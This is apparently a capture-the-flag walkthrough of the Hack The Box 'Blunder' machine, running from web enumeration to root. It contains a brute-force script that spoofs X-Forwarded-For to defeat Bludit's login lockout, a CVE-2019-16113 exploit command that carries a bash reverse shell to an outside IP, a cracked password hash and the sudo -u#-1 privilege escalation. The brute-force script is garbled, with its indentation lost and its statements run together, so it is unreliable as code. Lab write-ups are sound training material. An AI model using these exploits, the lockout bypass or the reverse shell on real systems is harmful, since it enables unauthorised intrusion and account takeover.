Blunder is Linux box which having IP address 10.10.10.191, Let’s start with nmap scan and some enumeration part.

#nmap

Nmap scan report for 10.10.10.191
Host is up (0.32s latency).
Not shown: 998 filtered ports
PORT   STATE  SERVICE VERSION
21/tcp closed ftp
80/tcp open   http?
|_http-generator: Blunder
| http-methods:
|_  Supported Methods: OPTIONS
|_http-title: Blunder | A blunder of interesting facts

#dirsearch

python3 dirsearch.py -u http://10.10.10.191 -e *
Target: http://10.10.10.191
[11:44:57] Starting[11:45:01] 200 -    7KB - /%3f/            
[11:45:10] 200 -  563B  - /.gitignore                                               
[11:45:30] 200 -    7KB - /0                                                    
[11:45:56] 200 -    3KB - /about                               
[11:46:04] 301 -    0B  - /admin  ->  http://10.10.10.191/admin/      
[11:46:08] 200 -    2KB - /admin/                     
[11:46:08] 200 -    2KB - /admin/.config

#wfuzz

wfuzz -c -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt --hc 404,403 -u "http://10.10.10.191/FUZZ.txt"
********************************************************
* Wfuzz 2.4.5 - The Web Fuzzer                         *
********************************************************
Target: http://10.10.10.191/FUZZ.txt
Total requests: 4658
===================================================================
ID           Response   Lines    Word     Chars       Payload                                                    
===================================================================
 
000003519:   200        1 L      4 W      22 Ch    "robots"                                                    
000004125:   200        4 L      23 W     118 Ch      "todo"                                                     

Dig into todo.txt

-Update the CMS
-Turn off FTP - DONE
-Remove old users - DONE
-Inform fergus that the new blog needs images - PENDING

And we found username Fergus of admin panel and got hint about Bludit CMS. Now tried for password guessing but didn’t work, try the common methodology create wordlist using cewl and try to bruteforce.

#cewl

cewl -w passwords.txt -d 10 -m 1 http://10.10.10.191

Tried different tools for brute force but didn’t work because of Bludit brute force mitigation https://rastating.github.io/bludit-brute-force-mitigation-bypass/

bruteforce.py

!/usr/bin/env python3
import re
import requests
from future import print_function
def open_ressources(file_path):
return [item.replace("\n", "") for item in open(file_path).readlines()]
host = 'http://10.10.10.191'
login_url = host + '/admin/login'
username = 'fergus'
wordlist = open_ressources('/home/kali/passwords.txt')
for password in wordlist:
session = requests.Session()
login_page = session.get(login_url)
csrf_token = re.search('input.+?name="tokenCSRF".+?value="(.+?)"', login_page.text).group(1)
print('[*] Trying: {p}'.format(p = password)) headers = { 'X-Forwarded-For': password, 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36', 'Referer': login_url } data = { 'tokenCSRF': csrf_token, 'username': username, 'password': password, 'save': '' } login_result = session.post(login_url, headers = headers, data = data, allow_redirects = False) if 'location' in login_result.headers: if '/admin/dashboard' in login_result.headers['location']: print() print('SUCCESS: Password found!') print('Use {u}:{p} to login.'.format(u = username, p = password)) print() break

 And got fergus:RolandDeschain login into CMS Bludit, Check for CVE for Bludit CMS and got CVE-2019-16113

https://github.com/cybervaca/CVE-2019-16113 // this exploit written in python as well as you can go with the Metasploit framework https://www.exploit-db.com/exploits/47699

I used exploit from github.

python3 CVE-2019-16113.py -u http://10.10.10.191 -user fergus -pass RolandDeschain -c "bash -c 'bash -i >& /dev/tcp/10.10.14.245/1337 0>&1'"

Listen for specific port in this case 1337

nc -lvp 1337

After got reverse shell, try to dig into some files /var/www/bludit-3.10.0a/bl-content/databases/ in this directory there is users.php file

There is hash value, first try to identify it and it’s SHA1 then try to crack it online https://md5decrypt.net/en/Sha1/ 

faca404fd5c0a31cf1897b823c695c85cffeb98d : Password120

#user

[email protected]:/var/www/bludit-3.9.2/bl-content/tmp$ su hugo
su hugo
Password: Password120
cat user.txt
13270375df398ae7fb7f28d27117d7aa

Now try simple method for getting root, tried sudo -l and got message (ALL, !root) /bin/bash.

Simple try google (ALL, !root) /bin/bash and got https://www.exploit-db.com/exploits/47502

#root

$ sudo -u#-1 /bin/bash
sudo -u#-1 /bin/bash
Password: Password120
[email protected]:/root# cat root.txt
cat root.txt
1116025955c775dd9462ff1f6f4bdd68

Hope you Enjoy it 😀

LEAVE A REPLY

Please enter your comment!
Please enter your name here